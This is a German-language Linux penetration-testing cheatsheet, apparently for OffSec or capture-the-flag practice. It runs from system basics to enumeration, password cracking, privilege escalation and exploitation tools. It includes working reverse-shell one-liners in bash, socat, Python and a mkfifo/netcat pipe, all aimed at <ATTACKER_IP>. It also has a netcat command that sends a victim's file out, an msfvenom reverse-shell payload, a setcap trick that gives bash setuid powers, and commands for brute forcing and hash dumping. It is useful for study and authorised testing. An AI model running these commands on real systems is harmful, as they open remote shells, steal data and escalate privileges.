Cheatsheet (exkl. Win)
🖥️ System Basics
System‑Info
uname -a # Kernel + Architektur
cat /etc/os-release # Distro‑Details
lscpu | head # CPU‑Info
free -m # RAM
uptime -p # Laufzeit
whoami && id # Aktueller User + Privs
hostname -I # Lokale IP‑Adressen
Prozess & Service
ps aux | head # Laufende Prozesse (erste 10)
top / htop # Live‑Übersicht
pgrep -u <USER> bash # PIDs des Users finden
pkill -9 <PID> # Prozess hart killen
systemctl status <SERVICE> # Service‑Status
systemctl restart <SERVICE> # Service neu starten
Dateien & Suche
find . -type f -name "*.php" # Rekursive Dateisuche
grep -R "password" . # Inhalt suchen
sed -n '1,20p' <FILE> # Zeilen anzeigen
awk -F: '{print $1}' /etc/passwd # Feld extrahieren
xargs -a list.txt rm # Batch‑Aktion
sort | uniq -c | sort -nr # Duplikate zählen
head -n 50 <FILE>; tail -n 20 <FILE> # Anfang & Ende
Berechtigungen
chmod 755 <FILE> # Rechte setzen (rwxr‑xr‑x)
chown <USER>:<GROUP> <FILE> # Besitzer ändern
getfacl <FILE> # ACL anzeigen
setfacl -m u:<USER>:r <FILE> # ACL setzen
getcap -r / 2>/dev/null # Linux‑Capabilities finden
setcap cap_setuid+ep /bin/bash # Beispiel: SUID‑ähnlich
Paket & Updates
apt update && apt upgrade -y # Debian/Ubuntu
yum update -y # CentOS/RHEL
pacman -Syu # Arch
Disk & RAM & Network‑Übersicht
df -h # Plattenbelegung
du -sh * | sort -h # Ordnergrössen
ss -tulpn | head # Offene Ports (tcp/udp, listening)
ip a # Interfaces
ip route # Routing‑Tabelle
tcpdump -i <IFACE> port 80 -c 10 # 10 Pakete auf Port 80 mitschneiden
Archivierung & Kompression
# TAR
tar -xvf <FILE>.tar # Extract
tar -xzvf <FILE>.tar.gz # mit gzip
tar -cvf <ARCHIVE>.tar <DIR>/ # Packen
# ZIP
zip -r <ARCHIVE>.zip <DIR>/ # Packen
unzip <FILE>.zip # Entpacken
# 7Z
7z a <ARCHIVE>.7z <DIR>/ # Packen
7z x <FILE>.7z # Entpacken
Quick Transfer & Listener
python3 -m http.server 8000 # Mini‑HTTP‑Server im aktuellen Pfad
php -S 0.0.0.0:8000 # PHP‑Server – gut für Uploads
nc -lvnp <LPORT> > <OUT.FILE> # Datei empfangen (Listener‑Host)
nc <ATTACKER_IP> <LPORT> < <IN.FILE> # Datei senden (Opfer)
scp <FILE> <USER>@<HOST>:/tmp # SCP Copy
rsync -avz <DIR>/ <USER>@<HOST>:/tmp # Schnelles Delta‑Copy
Reverse‑Shells (inkl. TTY‑Fix)
# Bash 1‑Liner
bash -i >& /dev/tcp/<ATTACKER_IP>/<LPORT> 0>&1
# Socat (stabil, vollwertiges TTY)
# Listener
socat TCP-LISTEN:<LPORT>,reuseaddr,fork STDOUT,stderr
# Opfer‑Shell
a=</bin/bash; socat TCP:<ATTACKER_IP>:<LPORT> EXEC:$a,pty,stderr,setsid,sigint,sane
# Python
python3 -c 'import pty,os,socket,subprocess;s=socket.socket();s.connect(("<ATTACKER_IP>",<LPORT>));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'
Git Basics
git clone <REPO_URL>
git log --oneline -n 5 # Kurze Historie
git checkout -b <BRANCH> # Neue Branch
📡 Netzwerk / Enumeration
Warum? Dienste entdecken, Ports prüfen, Tunnel legen.
SSH + Tunneling (Port‑Weiterleitungen)
ssh <USER>@<HOST> # Passwort‑Login
ssh -i <KEYFILE> <USER>@<HOST> # Key‑Auth
ssh -p <PORT> <USER>@<HOST> # Anderer Port
# Local‑Forward: Zugriff auf internen Dienst über localhost:8080
ssh -L 8080:<TARGET_IP>:80 <USER>@<HOST>
# Reverse‑Forward: Expose eigenen Port 4444 IN das entfernte Netz
ssh -R 4444:localhost:4444 <USER>@<HOST>
# Dynamisch (SOCKS‑Proxy): leitet ganzen Traffic (–> ProxyChains)
ssh -D 1080 <USER>@<HOST>
Netcat Tricks
# Standard‑Listener
nc -lvnp <LPORT>
# Verbinden
nc <HOST> <PORT>
# Listener mit Befehl‑History (rlwrap)
rlwrap nc -lvnp <LPORT>
# Named‑Pipe Shell – trickst EOF aus
mkfifo /tmp/f; /bin/sh 0</tmp/f | nc <ATTACKER_IP> <LPORT> >/tmp/f
Port‑Scan Quickies
nmap -sC -sV -oN init <HOST> # Default‑Scripts + Versionen
nmap -p- --min-rate 1000 <HOST> # Alle Ports schnell
nmap --script vuln -oN vuln <HOST> # Vuln‑Scripts
masscan -p1-65535 --rate 10000 <HOST> # Super‑schnell (root)
Web‑Fuzzing
gobuster dir -u http://<HOST> -w /usr/share/wordlists/dirb/common.txt -x php,txt -t 50
ffuf -u http://<HOST>/FUZZ -w wordlist.txt -mc 200,204,301,302
wfuzz -c -w wordlist.txt -u http://<HOST>/?file=FUZZ -hc 404
SMB & Windows‑Enum
smbclient -L \\<HOST> -N # Shares listen
enum4linux-ng <HOST> # Voll‑Enum
impacket-smbserver <SHARE> . # Schneller SMB‑Server
Container‑Blick
docker ps -a # Alle Container
docker exec -it <CONTAINER_ID> /bin/sh # Interaktiv einsteigen
🔐 Passwörter & Hashes
# Hashcat – Beispiele
hashcat -m 0 -a 0 <HASHFILE> rockyou.txt # MD5 Wordlist‑Attacke
hashcat -a 3 -m 1800 <HASHFILE> ?a?a?a?a?a?a # Bruteforce sha512crypt
# John
john <HASHFILE> --wordlist=rockyou.txt
john --show <HASHFILE>
# WPA (aircrack)
aircrack-ng <CAPTURE>.cap -w rockyou.txt
# Openssl – Passwort & File‑Crypto
openssl passwd -1 -salt <SALT> <PASSWORD> # MD5‑Crypt Hash
openssl enc -aes-256-cbc -in <FILE> -out <FILE>.enc -k <PASS>
openssl enc -d -aes-256-cbc -in <FILE>.enc -out <FILE> -k <PASS>
# Base64 Encode/Decode
echo -n "text" | base64
echo "dGV4dA==" | base64 -d
📚 Privilege Escalation Quick‑Wins
sudo -l # Welche Befehle darf ich mit sudo?
find / -perm -4000 -type f 2>/dev/null | grep -v "bin" # SUID‑Files ohne Standard‑Bins
linpeas.sh / winpeas.exe # Automatisierte Enum
getcap -r / 2>/dev/null # Capabilities suchen
capsh --print # Aktive Cap‑Sets
🛠️ OffSec‑Tools
Gruppiert nach Einsatzzweck. Meist genügen Basis‑Args plus Wordlisten.
Scanning & Enum
nmap, masscan, rustscan
amass enum -d <DOMAIN> -o enum.txt # Sub‑Domains
subfinder -d <DOMAIN>
Web Fuzz & Vuln
gobuster, ffuf, wfuzz, dirsearch
nikto -h http://<HOST>
wpscan --url http://<HOST>
Exploit & PoC
searchsploit <SOFTWARE> <VERSION>
msfconsole -> search <CVE> ; use exploit/... ; set RHOSTS <HOST> ; run
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=<LPORT> -f elf > rev.elf
Password & Hash Attack
hydra -l <USER> -P rockyou.txt <HOST> http-get /login
medusa -u <USER> -P rockyou.txt -h <HOST> -M ssh
Lateral Movement / Impacket
impacket-psExec <DOMAIN>/<USER>:<PASS>@<HOST> # Remote CMD
impacket-secretsdump -sam -system -security LOCAL <HOST> # Hash‑Dump
impacket-smbserver <SHARE> . # Drop‑Zone
SQL & DB
sqlmap -u "http://<HOST>/vuln.php?id=1" --dbs --batch
sqlite3 <DBFILE> ".tables"
Packet & Traffic
tcpdump -i <IFACE> -w capture.pcap
wireshark capture.pcap (GUI)
Wordlists & Crunch
crunch 8 8 abc123 -o list.txt # Länge 8, Charset
cewl http://<HOST> -w words.txt # Wörter aus Seite
⏹️ Cheatsheet Ende
Feedback? -> Ergänzen wir sofort.
Last updated